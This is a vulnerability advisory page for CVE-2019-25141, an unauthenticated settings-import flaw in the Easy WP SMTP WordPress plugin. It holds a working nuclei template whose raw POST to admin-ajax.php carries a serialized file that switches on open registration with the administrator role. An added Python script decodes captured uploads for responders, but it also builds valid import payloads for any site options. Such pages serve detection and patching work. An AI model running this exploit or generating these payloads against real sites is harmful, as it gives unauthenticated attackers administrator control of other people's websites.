CVE-2019-25141: Easy WP SMTP <= 1.3.9 - Missing Authorization to Arbitrary Options Update

Date: 2025-08-01 | Affected software: Easy WP SMTP | PoC: public

Vulnerability description

The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. The settings-import handler runs on the admin_init() hook without a capability check, and the uploaded settings file is not validated beyond a checksum. Because admin_init fires for requests to admin-ajax.php as well, an unauthenticated attacker can reach the handler and have every key in the uploaded PHP-serialized array written as a site option. As the PoC below shows, setting users_can_register to 1 and default_role to administrator turns self-registration into an administrator-account factory; the same primitive can overwrite any other option on the site.
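The import file format the PoC relies on is a PHP-serialized outer array with a "data" member (itself a serialized array of option name/value pairs) and a "checksum" member. The following Python is an added example, not code from the plugin or from the nuclei template: it builds such a file for an arbitrary set of options, decodes a captured one so a responder can see exactly which options it would overwrite, and reproduces the template's success condition. It assumes the checksum is MD5 of the "data" string (the plugin's importer is what actually enforces that) and the SENSITIVE_OPTIONS list is this example's own choice of keys worth flagging.

```python
"""Build and decode Easy WP SMTP settings-import blobs (CVE-2019-25141).

Added example; not the plugin's or the nuclei template's own code.
Assumption: the importer accepts a PHP-serialized array
{"data": <serialized option array>, "checksum": md5(data)} and calls
update_option() for every key in "data".
"""
import hashlib
import re

# Example's own list of option keys whose overwrite hands an attacker persistence.
SENSITIVE_OPTIONS = {"users_can_register", "default_role", "admin_email",
                     "siteurl", "home", "active_plugins"}

# Import file carried by the PoC request on this page (copied, not constructed).
PAGE_BLOB = (b'a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";'
             b's:12:"default_role";s:13:"administrator";}";s:8:"checksum";'
             b's:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}')


def php_serialize(value):
    """Minimal PHP serialize() for str/int/bool/dict with string or int keys."""
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode()), value)  # PHP counts bytes
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type: %r" % type(value))


_STR, _INT = re.compile(rb's:(\d+):"'), re.compile(rb"i:(-?\d+);")
_BOOL, _ARR = re.compile(rb"b:([01]);"), re.compile(rb"a:(\d+):\{")


def php_unserialize(blob, pos=0):
    """Minimal PHP unserialize() for s/i/b/a types; returns (value, next_offset)."""
    t = blob[pos:pos + 1]
    if t == b"s":
        m = _STR.match(blob, pos)
        n, start = int(m.group(1)), m.end()
        if blob[start + n:start + n + 2] != b'";':
            raise ValueError("bad string length at offset %d" % pos)
        return blob[start:start + n].decode(), start + n + 2
    if t == b"i":
        m = _INT.match(blob, pos)
        return int(m.group(1)), m.end()
    if t == b"b":
        m = _BOOL.match(blob, pos)
        return m.group(1) == b"1", m.end()
    if t == b"a":
        m = _ARR.match(blob, pos)
        pos, out = m.end(), {}
        for _ in range(int(m.group(1))):
            k, pos = php_unserialize(blob, pos)
            v, pos = php_unserialize(blob, pos)
            out[k] = v
        if blob[pos:pos + 1] != b"}":
            raise ValueError("unterminated array at offset %d" % pos)
        return out, pos + 1
    raise ValueError("unsupported PHP type %r at offset %d" % (t, pos))


def build_import_file(options):
    """Return the bytes of an import file that would update_option() every key."""
    data = php_serialize(options)
    checksum = hashlib.md5(data.encode()).hexdigest()  # assumption: md5(data)
    return php_serialize({"data": data, "checksum": checksum}).encode()


def decode_import_file(blob):
    """Return (options, checksum_ok) for a captured import file."""
    outer, _ = php_unserialize(blob)
    data = outer["data"]
    checksum_ok = hashlib.md5(data.encode()).hexdigest() == outer["checksum"]
    options, _ = php_unserialize(data.encode())
    return options, checksum_ok


def sensitive_keys(options):
    """Option names in the file that a responder should treat as a compromise signal."""
    return sorted(k for k in options if k in SENSITIVE_OPTIONS)


def matches_success(status_code, location):
    """Same condition as the template's matcher: redirect back to the settings page."""
    return status_code == 302 and "options-general.php?page=swpsmtp_settings" in location
```

Decoding PAGE_BLOB yields users_can_register=1 and default_role=administrator, both flagged by sensitive_keys; build_import_file reproduces the same 81-byte "data" string for those two options, and round-trips through decode_import_file. Feeding an upload captured by a WAF or a PHP upload_tmp_dir sweep into decode_import_file tells you what an attacker tried to set without having to read PHP serialization by eye.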

PoC code [public]

id: CVE-2019-25141

info:
  name: Easy WP SMTP <= 1.3.9 - Missing Authorization to Arbitrary Options Update
  author: DhiyaneshDK
  severity: critical
  description: |
    The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. This is due to missing capability checks on the admin_init() function, in addition to insufficient input validation. This makes it possible for unauthenticated attackers to modify the plugin's settings and arbitrary options on the site that can be used to inject new administrative user accounts.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/84b75f7d-7258-46f6-aee6-b96d70bee264?source=cve
    - https://medium.com/@ayman.abdul.kareem/from-bug-finder-to-risk-advisor-how-security-roles-are-evolving-db1aa86dd137
    - https://nvd.nist.gov/vuln/detail/CVE-2019-25141
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-25141
    cwe-id: CWE-862
    epss-score: 0.63236
    epss-percentile: 0.98349
    cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wp-ecommerce
    product: easy_wp_smtp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/easy-wp-smtp/"
  tags: cve,cve2019,wordpress,wp-plugin,wp,file-upload,easy-wp-smtp,intrusive

variables:
  filename: "{{rand_text_alpha(10)}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Connection: keep-alive

        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="action"

        swpsmtp_clear_log
        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="swpsmtp_import_settings"

        1
        --------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="swpsmtp_import_settings_file"; filename="{{filename}}.txt"
        Content-Type: text/plain

        a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

        --------------------------NCpI6tN3BZW3fz1Y9t2bkf--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(location, "options-general.php?page=swpsmtp_settings")'
        condition: and
# digest: 4b0a004830460221009b3410a9199e8a8387adf886d186c60701966d56597e14963b4bf6cd4e11262e02210089554a7667a5d6954c3a8bfe58c558153c53b001a47403383e2ef614beb6ec71:922c64590222798bb761d5b6d8e72950